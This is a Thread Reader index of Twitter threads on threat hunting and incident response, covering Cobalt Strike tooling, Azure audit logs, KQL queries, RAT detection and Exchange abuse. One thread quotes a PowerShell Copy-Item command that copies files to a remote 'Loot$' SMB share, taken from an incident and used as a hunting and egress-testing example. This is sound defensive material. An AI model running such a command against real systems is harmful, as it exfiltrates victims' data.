Discover and read the best of Twitter Threads about #threathunting

Most recents (24)

With the release of my open-source #CobaltStrike stager decoder (which you can read about here: stairwell.com/news/stairwell…) I thought I'd make a thread showcasing some of the other great open-source tooling out there to help with Cobalt Strike #ThreatHunting and #ThreatIntel 🧵
github.com/RomanEmelyanov…: These are the OG scripts designed for interfacing with Team Servers. Famous for its get_beacon script for milking staged payloads from Team Servers and decrypting them, this GH account also has a script for logging into teamservers and wordlists💀
github.com/JPCERTCC/aa-to… The first Cobalt Strike Beacon configuration extractor that I was aware of, @jpcert_en created a volatility plugin for finding and parsing Beacon configs from memory
Read 8 tweets
1/ #Azure In a recent case, the TA was able to compromise the user despite MFA (MFA fatigue).

After logging in, the attacker registered another mobile number as "Alternate Mobile Phone Call".

In the audit logs, we see this event within "Authentication Methods":

🧵 #DFIR
2/ The audit logs are a goldmine for finding suspicious behavior in an Azure tenant.

If we filter by "Core Directory", "UserManagement" and "Update user" ..
3/ .. we also see the ModifiedProperties (the modifications done by the attacker).

Notice, the primary Phone Number is a Swiss mobile phone (+41), and the attacker added a number from the United Arab Emirates (+971).

Suspicious? You bet!
Read 4 tweets
In the last months, I have collected some awesome new #KQL sources, and this 🧵lists them.
Are you using Defender For Endpoint, Sentinel, Intune or do you want to learn KQL then have a look!
#MDE #Sentinel #Intune #Detection #ThreatHunting
Type: Query
By: @msftsecurity
Link: github.com/Azure/Azure-Se…
Community-based repository for a lot of available data sources in Sentinel. For the E5 detections take a look in the Microsoft 365 Defender Folder.
Type: Query
By: @reprise_99
Link: github.com/reprise99/Sent…
Repository with 100s of KQL queries you can directly use. They are categorized into different Microsoft product categories. You are guaranteed to find useful queries here.
Read 14 tweets
At #IWCON2022, we have 15+ amazing #cybersecurity speakers from around the world 🌍

To share unique methods and findings with y’all 😍🙌

Get ready with your questions. Our experts will answer you live 🔥

Book your ticket: iwcon.live

Meet our speakers 🧵👇 Image
#1 Gabrielle Hempel @gabsmashh, #security engineer @Netwitness 🥳

Her topic: #Threat hunting in #cloud environments 🌩️

Time: 17th Dec, 7:30 pm IST

Want to attend this talk? 😍

Book your ticket here: iwcon.live

#cloudhunting #threathunting Image
#2 Luke Stephens @hakluke, founder of @haksecio 🔥

His topic: How I used #recon techniques to identify a prolific #scammer 👊

Time: 17th Dec, 6:30 pm IST ❤️

Don't wanna miss it?

Register today: iwcon.live

#infosec #hacking #hackingthehacker Image
Read 18 tweets
🦖Day 36 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: MacOS[.]System[.]QuarantineEvents

Link: docs.velociraptor.app/artifact_refer… Image
This artifact parses the 'com[.]apple.LaunchServices.QuarantineEventsV2' sqlite database to provide defenders with information around files that have been downloaded from the internet.

Information includes:

- DL Time
- DL URL
- Origin
- Agent Name/Bundle
- User
- Event UUID
On macOS, when a user downloads a file from the internet/third party source, the file will have an extended attribute associated with it called 'com[.]apple.quarantine'.

This asserts that the file will not be opened/executed, until explicitly allowed by the user (via prompt). Image
Read 9 tweets
Hey there, today we have something special for you.

Here's a list of SPY/INTELLIGENCE agencies across the world. 🕵️‍♀️🕵🌍🔎

#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT

1. RAW (Research & Analysis Wing), India
Formed: 21 September 1968
2. CIA (Central Intelligence Agency), USA
Formed: September 18, 1947
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
3. Mossad, Israel
Formed: 13 December 1949 (as the Central Institute for Coordination)
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
Read 12 tweets
1/ In a recent compromise, we saw the same multi-layered infection chain that eventually led to AsyncRAT, as described by the ASEC team. [1]

AsyncRAT could not connect to the C2 because the destination port on the firewall was blocked. 🧵

#CyberSecurity
2/ As can be seen in the screenshot above, port 6666 was used, which can be chosen arbitrarily within the builder from AsyncRAT.

3/ Of course, connections within the firewall logs that connect to an IP address on a high port are interesting for #ThreatHunting.

And, even more, connections to a blocked high port.
Read 5 tweets
Hey #OSINT, you might have heard about @spiderfoot, let's try to learn what it does the best. #ThreatHunting #threatintelligence #recon #infosec

A thread👇
SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more.
#ThreatHunting #threatintelligence #recon #infosec #OSINT
You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.
#ThreatHunting #threatintelligence #recon #infosec #OSINT
Read 6 tweets
1/ #ThreatHunting: @Avast has blogged how Roshtyak checks the VBAWarnings registry value.

If the value is 1 ("Enable all macros"), then the code will not be executed because it is assumed that this setting is only enabled in a sandbox (or by courageous users). 🧵 #CyberSecurity
2/ "Interestingly, this means that users, who for whatever reason have lowered their security this way, are immune to Roshtyak." [1]
3/ However, this "Enable all macros" value can also be explicitly set for Outlook

(Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook - Level = 1).

If this value is set to 1 in a user context, a nifty persistence within Outlook may have been set up by a TA.
Read 7 tweets
1/ #ThreatHunting: Normal users (not developers) who have Python in their Music (!) directory? This screams TA 😅

In an investigation on a breached network, we discovered the following directory:

C:\Users\<user>\Music\WPy64-39100\python-3.9.10.amdMusic\WPy64-39100
2/ The funny thing is that the TA appended "Music" to the ordinary directory name "python-3.9.10.amd64" to make it look more legitimate?

In several directories, we found attack scripts (written in Python), including noPac.py

(github.com/Ridter/noPac)
3/ And the whole impacket suite.

(github.com/SecureAuthCorp…)

Monitoring or creating a baseline (which users are using Python) could be helpful here, or just monitoring from which paths Python is started (like in our example from the Music directory).
Read 5 tweets
1/ #ThreatHunting:

In a compromised network, the TA used PCHunter on different systems to disable the local AV (or at least tried it).

In the web requests recorded on the firewall, we found traces of the download:
www.epoolsoft[.]com/pchunter/pchunter_free

🧵 #CyberSecurity
2/ @CrowdStrike also mentioned PCHUnter in the latest ThreatHunting report, along with GMER.

go.crowdstrike.com/rs/281-OBQ-266…
3/ I have tweeted about two of these tools (PCHunter / GMER) before, and we also see these two products regularly in our IR cases.

Read 4 tweets
1/ #ThreatHunting:

In a compromised network, we saw the following request in the proxy logs:

www.advanced-ip-scanner[.]com/checkupdate.php?[..]

This scanner is trendy among ransomware groups and has been mentioned in reports by @TheDFIRReport, among others. [1] 🧵
2/ This HTTP request can now be used very well for an alert.

Or better, collect and monitor all your DNS logs, because a DNS request will still go out if the Advanced IP Scanner is run without an installation (portable version).

An excellent opportunity for detection.
3/ You can see the DNS request for the domain www.advanced-ip-scanner[.]com below.
Read 4 tweets
1/ #ThreatHunting

Another one for the people who monitor PowerShell logs or command lines:

Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse

This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
2/ Of course, outgoing SMB traffic must be allowed on the firewall(s).

#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:

Copy-Item -Path "C:\Temp\" -Destination "\142.93.X.X\c$"
3/ On our specified endpoint on the Internet (with the
-Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):

# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
Read 4 tweets
A list of top 10 popular malware reports that every Malware Analyst should check out

Take a look at these excellent Malware analysis reports

#malware #ThreatHunting #threatintelligence #fireye #virus #Talos @TalosSecurity #linux #hacking #networks #rootkits

👇👇
1⃣ CheckPoint - SpeakUp: A New Undetected Backdoor Linux Trojan

🔗
research.checkpoint.com/2019/speakup-a…
2⃣ First Sednit UEFI Rootkit unveiled

🔗
mirror.netcologne.de/CCC/congress/2…
Read 11 tweets
1\ #ThreatHunting: Detecting OAuth Token Theft in Azure / M365

This technique is STILL being abused by Chinese APT groups. This blog covers several methods of detecting this technique😈.

It's also a good reminder to always perform browser forensics ;)

inversecos.com/2022/08/how-to…
2\ METHOD 1: Look for the OAuth redirect consent link in browser history and/or proxy logs.

Take note of the following fields:
- client_id (malicious app id)
- redirect_uri (malicious domain)
- scope (API permissions requested)
3\ Review permissions requested in the scope field (I'll show you where else to find these permissions in the logs).

Take note of these:
- User.Read
- User.ReadWrite
- User.ReadWrite.All
- Mail.ReadWrite
- Calendars.ReadWrite
- Files.ReadWrite
- User.Export.All
Read 6 tweets
1/ #ThreatHunting:

#QuasarRAT is another RAT we see from time to time in our IR cases and was also used against NATO facilities in March. [1]

We can hunt for

1⃣ The default port within the FW logs
2⃣Mutexes
3⃣User-Agent
4⃣Persistence mechanisms

🧵
2/ @qualys has published an excellent paper ("Stealthy Quasar Evolving to Lead the RAT Race") about Quasar, where the whole builder and much more are described in detail. [2]
3/ In the client builder (which creates an executable which is used for the infection), the default port is pre-configured to 4782. Image
Read 12 tweets
1/ #ThreatHunting

MeshCentral is another remote admin software installed by TAs we have seen in our IR cases [1].

Following is a brief introduction to the software and what forensic traces MeshCentral leaves on the network and the hosts. 🧵

#CyberSecurity
2/ For our tests, we use the hosted instance of MeshCentral.com, but the management software can also be run on a separate server, controlled by the TA.

After logging into the panel, we can download an agent for different operating systems (Windows, Mac, Linux).
3/ Before the installation or execution of the agent, the server URL is displayed under "Connection Details".

In our example, the agent connects to meshcentral.com, but another domain can be configured when the management server is self-hosted.
Read 19 tweets
1/ #ThreatHunting for #AsyncRAT

We have various ways to find infected hosts with AsyncRAT:

1⃣ Usage of standard C2 ports
2⃣Hunting for persistence
3⃣Mutexes FTW
4⃣Last but not least, hunting for dropped DLLs

Let's go 🤠🧵

#CyberSecurity
2/ AsyncRAT is a popular Trojan executed at the end of an infection chain on target computers.

@hpsecurity ([2],[3]) and @Trellix ([4]) have both reported in recent reports that TAs have been deploying AsyncRAT.
3/ Since the source code of AsyncRAT is publicly available [1], we can obtain a copy to investigate and build detection capabilities for this RAT.
Read 25 tweets
🔔I published a new script to parse the log of #AppLocker🔒 , which I called Get-AppLockerEventlog.ps1

It compiles all the useful data needed in #threathunting and #DFIR

You can find the script and the documentation here:
👉github.com/RomaissaAdjail…
2/ Also, You can save the output as a CSV.
3/ It comes with 04 cases (block, all, allow, audit)
Read 3 tweets
1/ Windows Error Reporting (WER) can provide investigators with a wealth of data including:
• SHA1 hashes of crashed processes
• Snapshot of process trees at time of crash
• Loaded modules of crash
• Process minidumps
#DFIR #Threathunting
See 🧵 for new #Velociraptor artefact
2/ WER files are found in the following locations which include a range of information to typically address an application crash, however we can use it for investigation!

C:/Users/*/AppData/Local/Microsoft/Windows/WER
C:/ProgramData/Microsoft/Windows/WER
3/ The "Report.wer" file includes binary information and binary path. In Windows 10 and above the field "TaskAppId" contain the SHA1 hash of the process (similar to Amcache).
Read 9 tweets
1/ Although Windows logs the creation of new services in the SYSTEM event log (Event ID 7045 - New Service was installed), attackers often delete these logs.

But we can use the Windows Firewall event logs for #ThreatHunting new installations (of backdoors) 🧵

#CyberSecurity
2/ The screenshot above shows the 2004 Event ID (the creation of a new firewall rule).

The screenshot is from an actual case where the attacker installed Splashtop as a backdoor (among others) to get back into the network.
3/ Using @velocidex Velociraptor and the EvtxHunter Hunt, we can conveniently collect these event logs on all clients and servers in the network.
Read 6 tweets
1\ #ThreatHunting for APT abuse of Exchange

APT Exchange abuse has been a common theme with techniques ranging from:
> Compiled DLL OWA backdoors
> .req webshells
> EWS / Legacy auth abuse
> Log / File deletion

TL;DR below or check out the full blog 👇👇
inversecos.com/2022/07/huntin… Image
2\ EWS and other legacy auth is commonly abused by APT groups (when enabled).

Check MSExchange Management.evtx log for EWS abuse.

Look for cmdlets like (more cmdlets in blog)
> New-MailboxExportRequest
> Remove-MailboxExportRequest
> Search-Mailbox
> Set-Mailbox Image
3\ Hunt IIS logs in Exchange for:
> Exploitation of unpatched vuln
> Webshell/owa backdoors being used
> Exfil

I've noted across engagements this happens in chunks via several extensions 7Z, TAR, RAR, PST, OST, CAB, ZIP). APTs will use several diff file types on one engagement Image
Read 9 tweets
Are you using any of the Microsoft Security products and/or #Sentinel? Then this thread is for you! The best resources for #KQL Advanced Hunting Queries or Analytics rules in my opinion.
#MDE #ThreatHunting #Detection #DFIR
github.com/reprise99/Sent… by @reprise_99. Awsome source! With the #365daysofkql series a lot of useful queries have been added. The queries are categorized by the different Microsoft products.
github.com/Azure/Azure-Se… by @msftsecurity. A lot of KQL queries can be found here, all of which are categorised on the basis of @MITREattack tactics.
Read 8 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!